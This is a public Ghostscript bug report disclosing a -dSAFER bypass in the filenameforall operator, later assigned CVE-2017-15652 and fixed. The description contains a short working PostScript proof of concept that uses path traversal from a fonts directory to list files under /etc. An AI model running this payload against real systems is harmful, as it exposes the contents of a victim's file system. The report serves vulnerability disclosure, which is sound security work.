Bug 698676 - Bypass -dSAFER in filenameforall command
Summary: Bypass -dSAFER in filenameforall command
Status: RESOLVED FIXED
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: Security (public) (show other bugs)
Version: unspecified
Hardware: PC Linux
: P4 normal
Assignee: Chris Liddell (chrisl)
QA Contact: gs-security
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2017-10-19 13:11 UTC by Jasper Yu
Modified: 2019-05-08 13:44 UTC (History)
0 users

See Also:
Customer:
Word Size: ---


Attachments
the script run with ghostscript 9.22 (191.32 KB, image/png)
2017-10-19 13:11 UTC, Jasper Yu
Details

Note You need to log in before you can comment on or make changes to this bug.
Description Jasper Yu 2017-10-19 13:11:59 UTC
Created attachment 14403 [details]
the script run with ghostscript 9.22

CVE-2013-5653 fixed the filenameforall can ignore -dSAFER and list the files.
But still, there are some way to bypass it.

%!PS
(/usr/share/fonts/../../../../../../../../etc/*) {print (\n) print} 1024 string filenameforall
quit

Is this possible to request a CVE ID?
Comment 1 Jasper Yu 2017-10-19 20:43:05 UTC
I just requested a CVE number from MITRE, and the following was assigned.

Please use this CVE as reference in patching or info dissemination related to this particular issue.

CVE-2017-15652

Thanks
Comment 2 Chris Liddell (chrisl) 2017-10-20 08:09:25 UTC
Fixed in:
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=2fc463d0e


Thanks for the report!